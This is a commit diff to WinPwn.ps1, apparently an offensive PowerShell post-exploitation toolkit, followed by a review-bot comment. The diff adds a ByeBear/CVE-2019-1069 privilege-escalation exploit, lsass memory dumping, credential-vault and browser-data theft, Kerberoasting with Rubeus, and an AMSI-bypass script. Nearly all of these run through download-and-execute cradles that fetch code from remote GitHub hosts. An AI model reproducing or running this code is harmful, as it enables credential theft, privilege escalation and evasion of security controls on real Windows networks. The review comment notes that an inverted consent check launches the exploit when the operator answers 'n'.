Add ByeBear Exploit && Grouper 2 GPO Audit
S3cur3Th1sSh1t authored Jul 8, 2019
1 parent 80f359e commit 97f9aa2
Showing 1 changed file with 64 additions and 19 deletions.
83 changes: 64 additions & 19 deletions WinPwn.ps1
Expand Up @@ -155,7 +155,7 @@ function sharpcradle{
if ($polar)
{
iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/SecureThisShit/Invoke-Sharpcradle/master/Invoke-Sharpcradle.ps1')
$polaraction = Read-Host -Prompt 'Do you have a valid username and password to elevate privileges?'
$polaraction = Read-Host -Prompt 'Do you have a valid username and password for CVE-2019-1069?'
if ($polaraction -eq "yes" -or $polaraction -eq "y" -or $polaraction -eq "Yes" -or $polaraction -eq "Y")
{
$username = Read-Host -Prompt 'Please enter the username'
Expand All @@ -178,22 +178,25 @@ function sharpcradle{
Invoke-Sharpcradle -uri https://github.com/SecureThisShit/Creds/raw/master/exeFiles/winexploits/SharpPolarbearx86.exe -argument1 license.rtf $username $password
}

<#$system = Read-Host -Prompt 'Did you get a system shell? (y/n)'
if ($system -eq "no" -or $system -eq "n" -or $system -eq "No" -or $system -eq "N")
{
Invoke-Sharpcradle -uri https://github.com/SecureThisShit/Creds/raw/master/exeFiles/winexploits/SharpByeBear.exe -argument1 "license.rtf 2"
Write-Host -ForegroundColor Yellow 'Click into the search bar on your lower left side'
Start-Sleep -Seconds 15
Write-Host 'Next Try..'
Invoke-Sharpcradle -uri https://github.com/SecureThisShit/Creds/raw/master/exeFiles/winexploits/SharpByeBear.exe -argument1 "license.rtf 2"
Write-Host -ForegroundColor Yellow 'Click into the search bar on your lower left side'
Start-Sleep -Seconds 15
}#>
move env:USERPROFILE\Appdata\Local\temp\license.rtf C:\windows\system32\license.rtf
del .\schedsvc.dll
del .\schtasks.exe
del C:\windows\system32\tasks\test
}
else
{
$system = Read-Host -Prompt 'You can also try to elevate privileges using the last sandboxescaper vuln (ByeBear). Lets do it? (y/n)'
if ($system -eq "no" -or $system -eq "n" -or $system -eq "No" -or $system -eq "N")
{
Invoke-Sharpcradle -uri https://github.com/SecureThisShit/Creds/raw/master/exeFiles/winexploits/SharpByeBear.exe -argument1 "license.rtf 2"
Write-Host -ForegroundColor Yellow 'Click into the search bar on your lower left side'
Start-Sleep -Seconds 15
Write-Host 'Next Try..'
Invoke-Sharpcradle -uri https://github.com/SecureThisShit/Creds/raw/master/exeFiles/winexploits/SharpByeBear.exe -argument1 "license.rtf 2"
Write-Host -ForegroundColor Yellow 'Click into the search bar on your lower left side'
Start-Sleep -Seconds 15
}
}
}
else
{
Expand Down Expand Up @@ -409,7 +412,14 @@ function kittielocal
{
Invoke-WCMDump >> $currentPath\Exploitation\WCMCredentials.txt
iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/SecureThisShit/Invoke-Sharpcradle/master/Invoke-Sharpcradle.ps1')
Invoke-Sharpcradle -uri https://github.com/SecureThisShit/Creds/blob/master/Ghostpack/SafetyKatz.exe?raw=true
$lsass = Read-Host -Prompt 'Only dump lsass without using the cat (more stealth)? (recommended) (yes/no)'
if ($lsass -eq "yes" -or $lsass -eq "y" -or $lsass -eq "Yes" -or $lsass -eq "Y")
{
iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/SecureThisShit/Creds/master/PowershellScripts/SafetyDump.ps1')
Write-Host -ForegroundColor Yellow 'Dumping lsass to C:\windows\temp\debug.bin :'
Safetydump
}
else{Invoke-Sharpcradle -uri https://github.com/SecureThisShit/Creds/blob/master/Ghostpack/SafetyKatz.exe?raw=true}

}
else
Expand Down Expand Up @@ -509,6 +519,7 @@ function localreconmodules
Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex >> "$currentPath\LocalRecon\NetRoutes.txt"
Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State >> "$currentPath\LocalRecon\ArpTable.txt"
netstat -ano >> "$currentPath\LocalRecon\ActiveConnections.txt"
Get-ChildItem 'HKLM:\SOFTWARE\Microsoft\NET Framework Setup\NDP' -Recurse | Get-ItemProperty -Name Version, Release -ErrorAction 0 | where { $_.PSChildName -match '^(?!S)\p{L}'} | select PSChildName, Version, Release >> "$currentPath\LocalRecon\InstalledDotNetVersions"
Write-Host -ForegroundColor Yellow 'Getting Shares'
net share >> "$currentPath\LocalRecon\Networkshares.txt"
Write-Host -ForegroundColor Yellow 'Getting hosts file content'
Expand Down Expand Up @@ -720,10 +731,16 @@ function localreconmodules
$IE = Read-Host -Prompt 'Dump IE / Edge Browser passwords? (yes/no)'
if ($IE -eq "yes" -or $IE -eq "y" -or $IE -eq "Yes" -or $IE -eq "Y")
{
[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime]
$vault = New-Object Windows.Security.Credentials.PasswordVault
$vault.RetrieveAll() | % { $_.RetrievePassword();$_ } >> "$currentPath\Exploitation\InternetExplorer_Credentials.txt"
}
[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime]
$vault = New-Object Windows.Security.Credentials.PasswordVault
$vault.RetrieveAll() | % { $_.RetrievePassword();$_ } >> "$currentPath\Exploitation\InternetExplorer_Credentials.txt"
}
$browserinfos = Read-Host -Prompt 'Dump all installed Browser history and bookmarks? (yes/no)'
if ($browserinfos -eq "yes" -or $browserinfos -eq "y" -or $browserinfos -eq "Yes" -or $browserinfos -eq "Y")
{
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/SecureThisShit/Creds/master/PowershellScripts/Get-BrowserInformation.ps1')
Get-BrowserInformation >> "$currentPath\LocalRecon\AllBrowserHistory.txt"
}
}

function passhunt
Expand Down Expand Up @@ -955,9 +972,30 @@ function domainreconmodules
{
passhunt -domain $true
}

$gpos = Read-Host -Prompt 'Check domain Group policies for common misconfigurations using Grouper2? (yes/no)'
if ($gpos -eq "yes" -or $gpos -eq "y" -or $gpos -eq "Yes" -or $gpos -eq "Y")
{
GPOAudit
}

}

function GPOAudit
{
<#
.DESCRIPTION
Check Group Policies for common misconfigurations using Grouper2.
Author: @securethisshit
License: BSD 3-Clause
#>
#Domain Recon
$currentPath = (Get-Item -Path ".\" -Verbose).FullName
pathcheck
iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/SecureThisShit/Invoke-Sharpcradle/master/Invoke-Sharpcradle.ps1')
Invoke-Sharpcradle -uri https://github.com/SecureThisShit/Creds/blob/master/Ghostpack/Grouper2.exe?raw=true -argument1 "-f" -argument2 "$currentPath\DomainRecon\GPOAudit.html"
}


function reconAD
{
Expand Down Expand Up @@ -1364,6 +1402,11 @@ function kerberoasting
pathcheck
Write-Host -ForegroundColor Yellow 'Starting Exploitation Phase:'
Write-Host -ForegroundColor Red 'Kerberoasting active:'
iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/SecureThisShit/Invoke-Sharpcradle/master/Invoke-Sharpcradle.ps1')
Write-Host -ForegroundColor Yellow 'Doing Kerberoasting + ASRepRoasting using rubeus. Output goes to .\Exploitation\'
Invoke-Sharpcradle -uri https://github.com/SecureThisShit/Creds/raw/master/Ghostpack/Rubeus.exe -argument1 asreproast -argument2 "/format:hashcat" >> $currentPath\Exploitation\ASreproasting.txt
Invoke-Sharpcradle -uri https://github.com/SecureThisShit/Creds/raw/master/Ghostpack/Rubeus.exe -argument1 kerberoast -argument2 "/format:hashcat" >> $currentPath\Exploitation\Kerberoasting_Rubeus.txt
Write-Host -ForegroundColor Yellow 'Using the powershell version for sure'
cmd /c start powershell -Command {$currentPath = (Get-Item -Path ".\" -Verbose).FullName;$Wcl = new-object System.Net.WebClient;$Wcl.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/SecureThisShit/Creds/master/obfuscatedps/amsi.ps1');IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1');Invoke-Kerberoast -OutputFormat Hashcat | fl >> $currentPath\Exploitation\Kerberoasting.txt;Write-Host -ForegroundColor Yellow ''Module finished, Hashes saved to .\Exploitation\Kerberoasting.txt:'' ;pause}
}

Expand Down Expand Up @@ -1567,7 +1610,8 @@ __ ___ ____
Write-Host -ForegroundColor Green '19. Execute some C# Magic for Creds, Recon and Privesc!'
Write-Host -ForegroundColor Green '20. Load custom C# Binaries from a webserver to Memory and execute them!'
Write-Host -ForegroundColor Green '21. Show some polar bears in action!'
Write-Host -ForegroundColor Green '22. Exit. '
Write-Host -ForegroundColor Green '22. Do an Group Policy Audit using Grouper2!'
Write-Host -ForegroundColor Green '23. Exit. '
Write-Host "================ WinPwn ================"
$masterquestion = Read-Host -Prompt 'Please choose wisely, master:'

Expand All @@ -1594,9 +1638,10 @@ __ ___ ____
19{sharpcradle -allthosedotnet $true}
20{sharpcradle}
21{sharpcradle -polar $true}
22{GPOAudit}
}
}
While ($masterquestion -ne 22)
While ($masterquestion -ne 23)


#End
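Review bot: The ByeBear branch in the sharpcradle hunk is inverted relative to its new prompt: the prompt at `$system = Read-Host -Prompt '... Lets do it? (y/n)'` asks for consent, but the following `if ($system -eq "no" -or $system -eq "n" -or $system -eq "No" -or $system -eq "N")` runs the body only on a negative answer, so `y` does nothing and `n` launches the exploit; the condition was carried over from the commented-out block above, where the question was 'Did you get a system shell?' and "no" meant retry. It should read `if ($system -eq "yes" -or $system -eq "y" -or $system -eq "Yes" -or $system -eq "Y")`, matching every other yes/no check added in this commit. sharpcradle itself begins and ends outside the hunk. Separately, the new `InstalledDotNetVersions` output path in localreconmodules is the only `>>` target in that block without a `.txt` suffix, and each new hunk still fetches and executes code straight from a mutable `master` branch with no hash or signature check before `iex`/Invoke-Sharpcradle, so a compromised upstream would run with the operator's privileges — worth pinning to a commit and verifying a digest first.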
